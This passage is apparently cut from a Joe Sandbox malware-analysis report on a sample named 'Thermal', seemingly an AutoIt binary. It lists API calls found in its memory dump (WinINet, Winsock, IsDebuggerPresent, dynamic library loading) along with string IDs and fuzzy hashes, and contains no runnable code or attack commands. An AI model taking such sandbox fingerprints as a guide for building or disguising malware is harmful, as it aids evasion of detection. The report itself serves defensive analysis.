                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: InfoItemMenu_memset
                                                • String ID: 0
                                                • API String ID: 2223754486-4108050209
                                                • Opcode ID: 12b50934023289d86ebbce92e318257f916ed7400c858f2cdb6e80d66b66eb96
                                                • Instruction ID: 6a0b15f1357843bf38cf8dde542860631c8f57395c30815e2037dc69118cad17
                                                • Opcode Fuzzy Hash: 12b50934023289d86ebbce92e318257f916ed7400c858f2cdb6e80d66b66eb96
                                                • Instruction Fuzzy Hash: 1D11E27290051EEBDB20DA98DC45B9D77B8BB45310F140123E955E73A0D77AEF09CB92
                                                APIs
                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007E28F8
                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007E2921
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Internet$OpenOption
                                                • String ID: <local>
                                                • API String ID: 942729171-4266983199
                                                • Opcode ID: 02d661a6c353212d3c8622c4ef429382ca793b3ef31f7bee278fb8ccb3d47ed3
                                                • Instruction ID: 5e242ca9f9a2ccf7828a8f1e1d960cf50eef5893c1467d119f04d90951f4f4fb
                                                • Opcode Fuzzy Hash: 02d661a6c353212d3c8622c4ef429382ca793b3ef31f7bee278fb8ccb3d47ed3
                                                • Instruction Fuzzy Hash: 07110670502365BAEB248F528C89EF7FB6CFF19350F10412AF54552101E7786892DBF0
                                                APIs
                                                  • Part of subcall function 007E86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,007E849D,?,00000000,?,?), ref: 007E86F7
                                                • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007E84A0
                                                • htons.WSOCK32(00000000,?,00000000), ref: 007E84DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWidehtonsinet_addr
                                                • String ID: 255.255.255.255
                                                • API String ID: 2496851823-2422070025
                                                • Opcode ID: 2803c663cde6bcd1c9064e7a59a11bda3e44c4838c84d92cc5e80a159df47847
                                                • Instruction ID: 673872c5b5522a0c44b8caddcbb20178d7f2ba2264ff100891e9cd42dc66d28e
                                                • Opcode Fuzzy Hash: 2803c663cde6bcd1c9064e7a59a11bda3e44c4838c84d92cc5e80a159df47847
                                                • Instruction Fuzzy Hash: F911C83510125AABDB20EF64DC46FBEB724FF09320F10851BF915972D1DB76A814CB56
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD
                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007C9A2B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: 391401af1b13fd5a7760b6cedb47f010f20de55bb19a729ab716fe581f5253fb
                                                • Instruction ID: d7233d356cae69eec69061a75e5279684a7611997ae6c61d89da29af252bdc5f
                                                • Opcode Fuzzy Hash: 391401af1b13fd5a7760b6cedb47f010f20de55bb19a729ab716fe581f5253fb
                                                • Instruction Fuzzy Hash: B901C471941124AB8B14FBA4CC5ADFE736DAF51310B40060DF871532C1EE3958089760
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __fread_nolock_memmove
                                                • String ID: EA06
                                                • API String ID: 1988441806-3962188686
                                                • Opcode ID: 68ecda6a0af8871567e61961b4b6e0dd8a2ee251be7f5935e0d5944bdb700dc2
                                                • Instruction ID: 162bceddeca33d03de999cdfc60086f980364920ac3e7cf77db6ba8ff43da2c7
                                                • Opcode Fuzzy Hash: 68ecda6a0af8871567e61961b4b6e0dd8a2ee251be7f5935e0d5944bdb700dc2
                                                • Instruction Fuzzy Hash: AE01F972804268BEDF18C6A8DC5AEFEBBF8DB15301F00419BF552D2281E579E6148760
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD
                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 007C9923
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: 6e57302d381f97efc8b8450eec4db0664f690fd0eadc0b0488422784e00c3682
                                                • Instruction ID: 61dddcfd631e865d81cce134ebc4eb6f96aa39c9ce4055007e42606d57294a85
                                                • Opcode Fuzzy Hash: 6e57302d381f97efc8b8450eec4db0664f690fd0eadc0b0488422784e00c3682
                                                • Instruction Fuzzy Hash: 4801D471A81104ABCB18FBA0D95AFFFB3ACAF51300F50011DB911A3281DE285E0897B2
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD
                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 007C99A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: 17d88c6bb1221b2fb53f1e8d0e2ff0781d7aae3804727a97fb2743ab0d2446a7
                                                • Instruction ID: 6cc0bcb3c0cd981ecb90640f3652279efbca669d0b47d6a0e0b3f360c4b68e61
                                                • Opcode Fuzzy Hash: 17d88c6bb1221b2fb53f1e8d0e2ff0781d7aae3804727a97fb2743ab0d2446a7
                                                • Instruction Fuzzy Hash: 9A01A772A81114A7CB14FBB4DA1AFFFB3AD9F51340F50011DBD55A3281DE2D5E089672
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ClassName_wcscmp
                                                • String ID: #32770
                                                • API String ID: 2292705959-463685578
                                                • Opcode ID: 2829d67f0709f0432143c263f0e48a52d88063fc225e2b3796121073edd9461c
                                                • Instruction ID: 6cd91caf83d1c2decee56f3c6e0d8354eea74dfdf1c7b6275e35adbfbb63af86
                                                • Opcode Fuzzy Hash: 2829d67f0709f0432143c263f0e48a52d88063fc225e2b3796121073edd9461c
                                                • Instruction Fuzzy Hash: F9E068336003286BD720AB99BC49FABFBACFB44731F000017FC04D7151EA64AA408BE0
                                                APIs
                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007C88A0
                                                  • Part of subcall function 00793588: _doexit.LIBCMT ref: 00793592
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Message_doexit
                                                • String ID: AutoIt$Error allocating memory.
                                                • API String ID: 1993061046-4017498283
                                                • Opcode ID: fd027321d32b88d4add0225920c06b8e84295bb1b9383b475c32fbd09c865108
                                                • Instruction ID: bf0e9c7d45b5fc796df0573616147fc6f045f454a005cc301de3f57294e7605d
                                                • Opcode Fuzzy Hash: fd027321d32b88d4add0225920c06b8e84295bb1b9383b475c32fbd09c865108
                                                • Instruction Fuzzy Hash: DBD0123138536872D25432A87C1EFCA7A489B15B51F00442ABB18A55C349DE89D042A5
                                                APIs
                                                  • Part of subcall function 007AB544: _memset.LIBCMT ref: 007AB551
                                                  • Part of subcall function 00790B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007AB520,?,?,?,0077100A), ref: 00790B79
                                                • IsDebuggerPresent.KERNEL32(?,?,?,0077100A), ref: 007AB524
                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0077100A), ref: 007AB533
                                                Strings
                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007AB52E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                • API String ID: 3158253471-631824599
                                                • Opcode ID: d6bf13a6476fa4977547d5aa5d87bc459034c74705f825cc7003803e4a8c2ccf
                                                • Instruction ID: 39677c42e90fb0ddc309390bf6c949f67c25f643f4eb54d691cd26ac28823074
                                                • Opcode Fuzzy Hash: d6bf13a6476fa4977547d5aa5d87bc459034c74705f825cc7003803e4a8c2ccf
                                                • Instruction Fuzzy Hash: D9E06DB06003118FD760AF29E809B467AE4BF44304F108A2DE456C6741DBB8D548CB91
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?), ref: 007B0091
                                                  • Part of subcall function 007EC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,007B027A,?), ref: 007EC6E7
                                                  • Part of subcall function 007EC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007EC6F9
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 007B0289
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                • String ID: WIN_XPe
                                                • API String ID: 582185067-3257408948
                                                • Opcode ID: 566b5096925e5a280d1521b75bf0a9136b8baba88354b92426f2a839ec70a27c
                                                • Instruction ID: 22bf7818ab64315aaf982f16ca374a549dee382bd6f7090ee9dbae7e6b01ae82
                                                • Opcode Fuzzy Hash: 566b5096925e5a280d1521b75bf0a9136b8baba88354b92426f2a839ec70a27c
                                                • Instruction Fuzzy Hash: 86F0ED71805109DFCB65EBA5C998BEEBBF8BB48300F644495E146B21A0CB794F84DF61